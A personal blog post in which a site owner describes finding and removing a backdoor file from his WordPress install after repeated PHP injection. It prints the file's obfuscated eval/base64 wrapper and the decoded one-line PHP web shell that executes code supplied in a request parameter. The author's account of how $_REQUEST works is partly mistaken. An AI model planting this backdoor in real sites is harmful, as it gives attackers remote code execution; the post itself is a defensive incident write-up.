Cyber Cold War Update

Just a brief update on the security issues at my website mentioned in the last post. As those of you smarter than I am on the mechanisms of these php-injection attacks probably recognized, the measures I took in the last post were not the end of the story. Sure enough, despite thinking that I had ripped enough of the attack code out to end the matter, I found that the next day my site was down again, with the same foreign code reinjected into the WordPress php files. At the risk of boring my readers, but in the hopes of helping anyone in a similar situation, I’ll relate how I solved the problem.

This article was very helpful in helping to expose the backdoor that the attackers left that allowed them to reintroduce the attack (I don’t think they personally did this.  I believe the whole process is just automated).  I scanned my server for rootkits and there were none found.  All the modified files had an owner of www-data which is the unprivileged user that owns all the WordPress files.  So I didn’t think someone had broken into the server though my username and password, or had any root access.  Most likely they got in through an older version of WordPress that had some vulnerability.  When I reinstalled WordPress after the attack, I was copying over old files with new files.  If there was a file that didn’t belong, it would persist with each WordPress update.  I had to find that file.  I did a file diff between a clean WordPress installation and my WordPress.  And there it was.  A file named fetpd.php that was not supposed to be there.  I looked at the file contents.  Definitely a bad guy:

<?php /*4ut|*/eval/*ym’ s3i*/(/*?{G5zM*/base64_decode/*T:%Zb[*/(/*l8d@*/’LyosXFgqL2V2YWwvKl9fPyovKC8qQjFBTyc … [several lines of the same] … qeX5sICov’/*0[N1puZ8*/)/*U2xKUo.*//*z’pQ^AJ*/)/*OR= Vv*//*E(og*/;/*No,S|*/ ?>

Sneaky programmer put in lots of /*comments*/ to make it look even more confusing.  Using my base64 decoder after removing the comments, I got a similar string!  The attacker had encoded it twice!  Repeating the process I got the following, after removing more comments:

if(isset($_REQUEST[‘bfbltl’]))eval(stripslashes($_REQUEST[‘bfbltl’]));

I’m not an expert, and after looking up the $_REQUEST function on the PHP online help, I am still not completely certain, but I believe this function can grab code from another site, or a cookie at another site, and basically execute it as php code.  So I think this was the cause of the reinfection.  I am still a little disturbed because I don’t know what triggers the running of this code (is there another file somewhere calling fetpd.php?), but at least after I ripped out this little piece of nastiness the site has stayed up.  Take that Russkies!

 

About mannd

I am a retired cardiac electrophysiologist who has worked both in private practice in Louisville, Kentucky and as a Professor of Medicine at the University of Colorado in Denver. I am interested not only in medicine, but also in computer programming, music, science fiction, fantasy, 30s pulp literature, and a whole lot more.

2 thoughts on “Cyber Cold War Update

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.